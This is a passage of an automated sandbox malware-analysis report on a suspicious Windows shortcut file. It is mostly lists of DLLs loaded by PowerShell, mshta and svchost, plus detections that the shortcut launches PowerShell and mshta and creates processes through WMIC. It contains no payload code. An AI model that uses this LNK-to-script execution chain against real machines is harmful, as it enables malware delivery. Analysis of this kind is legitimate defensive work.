Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: K9esyY0r4G.lnkLNK file: ..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7D2325 push eax; iretd 4_2_00007FFD9B7D233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7D00AD pushad ; iretd 4_2_00007FFD9B7D00C1

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
